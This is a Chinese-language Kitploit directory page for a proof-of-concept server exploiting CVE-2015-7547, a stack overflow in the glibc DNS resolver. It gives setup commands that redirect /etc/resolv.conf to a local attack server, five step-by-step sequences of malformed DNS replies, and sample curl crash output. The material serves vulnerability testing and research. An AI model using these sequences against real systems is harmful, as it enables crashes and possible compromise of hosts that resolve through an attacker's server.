Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2015-7547 — CVE-2015-7547 的 PoC 漏洞利用服务器 | Kitploit
工具/GitHubGitHub/jgajek/cve-2015-7547
漏洞分析漏洞利用模糊测试渗透测试DNS 分析二进制利用
GitHubjgajek/cve-2015-7547

cve-2015-7547

CVE-2015-7547 的 PoC 漏洞利用服务器

查看仓库
8510年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

针对 glibc DNS 解析器中 CVE-2015-7547 漏洞的 PoC 攻击服务器

在本地存在漏洞的 glibc 版本上测试:

root@kitploit:~
user@localhost:/# echo 'nameserver 127.0.0.127' | sudo tee /etc/resolv.conf
user@localhost:/# echo 'nameserver 127.0.0.127' | sudo tee -a /etc/resolv.conf
user@localhost:/# sudo python3 attack-server.py 127.0.0.127
Starting UDP server on 127.0.0.127:53...
Starting TCP server on 127.0.0.127:53...

然后,在另一个终端会话中,按照下面示例中的方式执行攻击。

攻击 1(UDP+TCP)

需要能够在 UDP 和 TCP 上发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,大于 2048 字节,有效的头/问题部分,设置 TC 标志(触发缓冲区管理不当和 TCP 重试)

  2. TCP 回复,有效的头/问题部分(强制将下一个回复存储到栈分配的缓冲区中)

  3. TCP 回复,大于 2048 字节(溢出栈分配的缓冲区)

示例:

root@kitploit:~
user@localhost:/# curl http://attack1
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 2(仅 UDP)

需要能够在 UDP 上发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,大于 2048 字节,无效的头(触发缓冲区管理不当,不计为有效响应)

  2. 忽略下一个请求(因轮询超时触发 UDP 重试)

  3. UDP 回复,有效的头/问题部分(强制将下一个回复存储到栈分配的缓冲区中)

  4. UDP 回复,大于 2048 字节(溢出栈分配的缓冲区)

示例:

root@kitploit:~
user@localhost:/# curl http://attack2
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 3(UDP+TCP)

需要能够在 UDP 上发送大于 1024 字节的回复,并在 TCP 上发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,1024 字节,有效的头/问题部分(填满栈分配的缓冲区的一半)

  2. UDP 回复,大于 1024 字节,有效的头/问题部分,设置 TC 标志(触发缓冲区管理不当和 TCP 重试)

  3. TCP 回复,有效的头/问题部分(强制将下一个回复存储到栈分配的缓冲区中)

  4. TCP 回复,大于 2048 字节(溢出栈分配的缓冲区)

示例:

root@kitploit:~
user@localhost:/# curl http://attack3
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 4(仅 UDP)

需要能够在 UDP 上发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,2048 字节,有效的头/问题部分(填满栈分配的缓冲区)

  2. UDP 回复(因 0 字节套接字接收触发缓冲区管理不当和 UDP 重试)

  3. UDP 回复,有效的头/问题部分(强制将下一个回复存储到栈分配的缓冲区中)

  4. UDP 回复,大于 2048 字节(溢出栈分配的缓冲区)

示例:

root@kitploit:~
user@localhost:/# curl http://attack4
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 5(仅 TCP)

需要能够在 TCP 上发送大于 2048 字节的回复,并且 /etc/resolv.conf 中至少要有两个 nameserver 条目。

攻击序列:

  1. UDP 回复,有效的头/问题部分,设置 TC 标志(可选,如果初始查询通过 UDP 发出,则触发 TCP 重试)

  2. TCP 回复,大于 2048 字节(触发缓冲区管理不当)

  3. TCP 回复,空(因 0 字节套接字接收触发 TCP 重试)

  4. TCP 回复,有效的头/问题部分(强制将下一个回复存储到栈分配的缓冲区中)

  5. TCP 回复,大于 2048 字节(溢出栈分配的缓冲区)

示例:

root@kitploit:~
user@localhost:/# curl http://attack5
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)
下载工具